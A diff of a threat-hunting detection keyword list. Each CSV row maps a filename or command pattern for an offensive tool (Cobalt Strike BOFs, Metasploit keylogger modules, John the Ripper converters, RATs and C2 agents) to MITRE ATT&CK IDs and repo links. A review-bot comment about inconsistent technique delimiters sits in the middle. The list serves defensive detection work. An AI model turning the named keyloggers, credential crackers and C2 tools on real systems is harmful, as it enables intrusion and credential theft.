TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*kernel-exploits*","offensive_tool_keyword","Github Username","github repo name hosting windows kernel exploits","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/SecWiki/windows-kernel-exploits","1","1","N/A","N/A","10","7475","2853","2021-06-11T23:29:15Z","2017-04-25T04:02:31Z" "*KernelMii.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","72","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" "*KernelMii.x64.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","72","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" "*KernelMii.x64.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - 
Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","72","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" "*KernelMii.x86.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","72","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" "*KernelMii.x86.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","72","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" "*Kevin-Robertson/Inveigh*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" -"*keychain2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*keylistattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*keychain2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*keylistattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*keylog_dump*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*keylog_dump*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*keylog_inject *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" "*keylog_inject.py*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" "*keylog_off*","offensive_tool_keyword","C2_Server","C2 server to connect to a 
victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*keylog_on*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" -"*keylog_recorder.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*keylog_recorder.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*keylog_recorder.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*keylog_recorder.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*keylog_start*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*keylog_stop*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*keylogger dump*","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/hash3liZer/SillyRAT","1","0","N/A","N/A","6","594","151","2023-06-23T18:49:43Z","2020-05-10T17:37:37Z" 
@@ -12740,17 +12896,17 @@ "*keylogger stopped*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*Keylogger*","offensive_tool_keyword","keylogger keyword","keylogger keyword. could be related to keylooger tools ","T1056.001 ","TA0006","N/A","N/A","POST Exploitation tools","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Keylogger.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*Keylogger.exe*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" -"*Keylogger.pdb*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" -"*Keylogger.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Keylogger.exe*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*Keylogger.pdb*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*Keylogger.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*keylogger.py*","offensive_tool_keyword","disctopia-c2","Windows Remote Administration Tool that uses Discord Telegram and GitHub as C2s","T1105 - T1043 - T1102","TA0003 - TA0008 - TA0002","N/A","N/A","C2","https://github.com/3ct0s/disctopia-c2","1","1","N/A","10","10","321","89","2023-09-26T12:00:16Z","2022-01-02T22:03:10Z" -"*keylogrecorder.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*keylogrecorder.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*keylooger.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*keyring2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*keyring2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*keyscan dump*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*keyscan start*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*keyscan stop*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" -"*keystore2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*keystore2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*KeyTabExtract*","offensive_tool_keyword","KeyTabExtract","KeyTabExtract is a little utility to help extract valuable information from 502 type .keytab files. which may be used to authenticate Linux boxes to Kerberos. The script will extract information such as the realm. Service Principal. 
Encryption Type and NTLM Hash","T1003 - T1552.004 - T1110 - T1210","TA0006 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/sosdave/KeyTabExtract","1","0","N/A","N/A","2","145","36","2020-08-26T01:03:37Z","2019-03-18T15:00:14Z" "*keyword_obfuscation*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*kgretzky*","offensive_tool_keyword","Github Username","username Kuba Gretzky hosting sniffing and spoofing exploitation tools","N/A","N/A","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
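Review bot: The refreshed `*Keylogger.ps1*` (nishang) row still carries its technique list as `T1550 T1555 T1212 T1558`, space-separated and with tactics `N/A`, while the other rows visible here join IDs with ` - `; a consumer that splits on that delimiter will read the field as a single unknown technique and lose the ATT&CK mapping for this detection. The `*keylogrecorder.rb*` row rewritten in the same hunk has the same kind of break in `T1204 -T1210`, and the identical metasploit text recurs in the other metasploit rows this commit touches. Since these lines are being regenerated anyway, I would normalise them to `T1550 - T1555 - T1212 - T1558` and `T1204 - T1210`. None of the nishang IDs describes keystroke capture, so adding `T1056.001` (the ID the neighbouring `*Keylogger*` row uses) looks appropriate, though that mapping should be confirmed against the script itself.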
@@ -12759,9 +12915,9 @@ "*kh4sh3i/Spring-CVE*","offensive_tool_keyword","POC","POC exploit for CVE-2022-22963","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/kh4sh3i/Spring-CVE","1","1","N/A","N/A","1","13","7","2022-03-31T20:58:54Z","2022-03-31T20:19:51Z" "*khast3x*","offensive_tool_keyword","Github Username","Red team exploitation tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/khast3x","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*khast3x/h8mail*","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Information Gathering","https://github.com/opencubicles/h8mail","1","1","N/A","N/A","1","9","5","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z" -"*Kicking off download cradle in a new process*","offensive_tool_keyword","empire","empire script command. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 